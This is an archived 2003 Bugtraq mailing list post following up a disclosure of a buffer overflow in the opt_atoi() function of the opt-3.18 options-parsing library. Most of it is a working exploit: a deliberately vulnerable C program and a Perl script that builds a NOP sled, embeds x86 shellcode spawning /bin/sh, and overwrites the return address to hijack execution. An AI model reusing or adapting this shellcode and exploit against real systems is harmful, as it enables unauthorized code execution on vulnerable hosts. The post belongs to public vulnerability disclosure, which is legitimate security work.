Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Options Parsing Tool library buffer overflows.
From: Julien Lanthea <contact () jlanthea net>
Date: 23 May 2003 14:41:39 -0000

In-Reply-To: <3EA85B02.7080000 () snosoft com>

As the Secure Network Operations, Inc. (http://www.secnetops.com) told on 
Bugtraq (Apr 24 2003), the function opt_atoi() from the subroutine library
opt-3.18 and prior is vulnerable to buffer overflow attacks.

Here is a sample showing how to exploit the following vulnerable program 
vuln.c using opt_atoi().

vuln.c :
--------

/* To compile vuln.c :                              */
/* cc -o vuln vuln.c /path/to/opt-3.18/src/libopt.a */

main(int *argc, char **argv)
{
  /* use OPT opt_atoi() */
        int y = opt_atoi(argv[1]);        printf("opt_atoi(): %i\n", y);
}




expl-optatoi.pl :
-----------------

#!/usr/bin/perl
#
# expl-optatoi.pl : opt_atoi() function exploit (from Options Parsing 
# Tool shared library opt-3.18 and prior) for this vulnerable code.
#
# vuln.c : 
#    main(int *argc, char **argv)
#    {
#        /* use OPT opt_atoi() */
#        int y = opt_atoi(argv[1]);        
#        printf("opt_atoi(): %i\n", y);
#     }
#
# cc -o vuln vuln.c /path/to/opt-3.18/src/libopt.a
#
# Author : 
#    jlanthea [contact () jlanthea net]
#
# Syntax : 
#    perl expl-optatoi.pl <offset>   # works for me with offset = -1090


$shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
             "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
             "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
             "\xff\xff/bin/sh";


$len = 1032;        # The length needed to own EIP.
$ret = 0xbffff6c0;  # The stack pointer at crash time
$nop = "\x90";      # x86 NOP
$offset = 0;    # Default offset to try.


if (@ARGV == 1) {
    $offset = $ARGV[0];
}

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}

$buffer .= $shellcode;

print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");

$new_ret = pack('l', ($ret + $offset));

for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}

exec("/path/to/vuln $buffer");


  By Date           By Thread  

Current thread:
  • Re: Options Parsing Tool library buffer overflows. Julien Lanthea (May 23)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]